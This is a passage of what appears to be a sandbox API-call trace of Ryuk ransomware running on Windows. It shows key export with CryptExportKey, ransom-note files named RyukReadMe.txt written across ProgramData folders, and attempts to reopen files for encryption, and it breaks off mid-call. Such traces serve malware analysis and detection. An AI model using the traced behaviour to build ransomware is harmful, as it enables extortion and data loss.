[0140.238] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0140.238] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0xa, lpOverlapped=0x0) returned 1 [0140.239] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0140.239] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0140.239] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0140.239] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0140.239] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac888*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac888*, lpNumberOfBytesWritten=0x29ac858*=0x10, lpOverlapped=0x0) returned 1 [0140.239] CloseHandle (hObject=0x18c) returned 1 [0140.495] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.499] CryptDestroyKey (hKey=0x3b8690) returned 1 [0140.499] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.500] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.500] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.500] SetLastError (dwErrCode=0x0) [0140.500] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\RyukReadMe.txt" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0140.500] GetLastError () returned 0x0 [0140.500] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0140.501] CloseHandle (hObject=0x188) returned 1 [0140.501] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.501] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.501] SetLastError (dwErrCode=0x0) [0140.501] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\RyukReadMe.txt" (normalized: "c:\\programdata\\adobe\\arm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.501] GetLastError () returned 0xb7 [0140.501] CloseHandle (hObject=0x184) returned 1 [0140.502] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0140.502] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0140.502] SetLastError (dwErrCode=0x0) [0140.502] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\RyukReadMe.txt" (normalized: "c:\\programdata\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.502] GetLastError () returned 0xb7 [0140.502] CloseHandle (hObject=0x180) returned 1 [0140.502] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.502] SetLastError (dwErrCode=0x0) [0140.502] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.502] GetLastError () returned 0xb7 [0140.502] CloseHandle (hObject=0x180) returned 1 [0140.502] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Application Data\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0xffffffffffffffff [0140.502] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.502] SetLastError (dwErrCode=0x0) [0140.502] CreateFileW (lpFileName="C:\\ProgramData\\Application Data\\RyukReadMe.txt" (normalized: "c:\\programdata\\application data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.502] GetLastError () returned 0xb7 [0140.502] CloseHandle (hObject=0x180) returned 1 [0140.502] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.502] SetLastError (dwErrCode=0x0) [0140.502] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.503] GetLastError () returned 0xb7 [0140.503] CloseHandle (hObject=0x180) returned 1 [0140.503] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Desktop\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0xffffffffffffffff [0140.503] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.503] SetLastError (dwErrCode=0x0) [0140.503] CreateFileW (lpFileName="C:\\ProgramData\\Desktop\\RyukReadMe.txt" (normalized: "c:\\programdata\\desktop\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.503] GetLastError () returned 0x5 [0140.503] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0140.503] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.503] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.503] SetLastError (dwErrCode=0x0) [0140.503] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.503] GetLastError () returned 0xb7 [0140.503] CloseHandle (hObject=0x180) returned 1 [0140.503] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Documents\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0xffffffffffffffff [0140.503] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.503] SetLastError (dwErrCode=0x0) [0140.503] CreateFileW (lpFileName="C:\\ProgramData\\Documents\\RyukReadMe.txt" (normalized: "c:\\programdata\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.504] GetLastError () returned 0x0 [0140.504] WriteFile (in: hFile=0x180, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ae150*=0x320, lpOverlapped=0x0) returned 1 [0140.505] CloseHandle (hObject=0x180) returned 1 [0140.505] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.505] SetLastError (dwErrCode=0x0) [0140.505] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.505] GetLastError () returned 0xb7 [0140.505] CloseHandle (hObject=0x180) returned 1 [0140.505] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Favorites\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0xffffffffffffffff [0140.505] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.505] SetLastError (dwErrCode=0x0) [0140.505] CreateFileW (lpFileName="C:\\ProgramData\\Favorites\\RyukReadMe.txt" (normalized: "c:\\programdata\\favorites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.505] GetLastError () returned 0x0 [0140.505] WriteFile (in: hFile=0x180, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ae150*=0x320, lpOverlapped=0x0) returned 1 [0140.506] CloseHandle (hObject=0x180) returned 1 [0140.506] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0140.506] SetLastError (dwErrCode=0x0) [0140.506] CreateFileW (lpFileName="C:\\ProgramData\\RyukReadMe.txt" (normalized: "c:\\programdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0140.506] GetLastError () returned 0xb7 [0140.506] CloseHandle (hObject=0x180) returned 1 [0140.506] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0140.507] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.507] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.507] SetLastError (dwErrCode=0x0) [0140.507] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.507] GetLastError () returned 0x5 [0140.507] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.507] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.507] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.507] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.507] SetLastError (dwErrCode=0x0) [0140.507] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.507] GetLastError () returned 0x5 [0140.507] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.507] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.507] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.507] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.508] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.508] SetLastError (dwErrCode=0x0) [0140.508] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.508] GetLastError () returned 0x5 [0140.508] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.508] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.508] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.508] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.508] SetLastError (dwErrCode=0x0) [0140.508] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.508] GetLastError () returned 0x5 [0140.508] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0140.508] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.508] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0140.510] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.510] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.510] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.510] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D", dwFileAttributes=0x80) returned 0 [0140.511] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.511] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.511] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.511] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.511] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.511] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W", dwFileAttributes=0x80) returned 0 [0140.511] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.511] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.511] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.511] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.511] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.512] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W", dwFileAttributes=0x80) returned 0 [0140.512] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.512] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.512] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.513] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.513] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.513] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H", dwFileAttributes=0x80) returned 0 [0140.513] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.513] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.513] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.513] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.513] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.513] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D", dwFileAttributes=0x80) returned 0 [0140.513] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.514] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.514] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.514] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.514] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.514] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck", dwFileAttributes=0x80) returned 0 [0140.514] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.514] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.514] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.514] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0140.514] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.514] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", dwFileAttributes=0x80) returned 0 [0140.515] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help{9daa54e8-cd95-4107-8e7f-ba3f24732d95}.h1q"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.515] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.515] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.515] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0140.515] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0140.516] SetLastError (dwErrCode=0x0) [0140.516] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.518] GetLastError () returned 0x5 [0140.518] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0140.518] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.518] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.518] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.518] SetLastError (dwErrCode=0x0) [0140.518] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.518] GetLastError () returned 0x5 [0140.518] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.519] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.519] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.519] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.519] SetLastError (dwErrCode=0x0) [0140.519] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\Client\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.519] GetLastError () returned 0x5 [0140.519] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.519] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.519] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.519] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.519] SetLastError (dwErrCode=0x0) [0140.519] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Assistance\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\assistance\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.519] GetLastError () returned 0x5 [0140.519] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.519] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.519] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.519] SetLastError (dwErrCode=0x0) [0140.519] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.519] GetLastError () returned 0x5 [0140.519] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.520] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Crypto\\*.*", 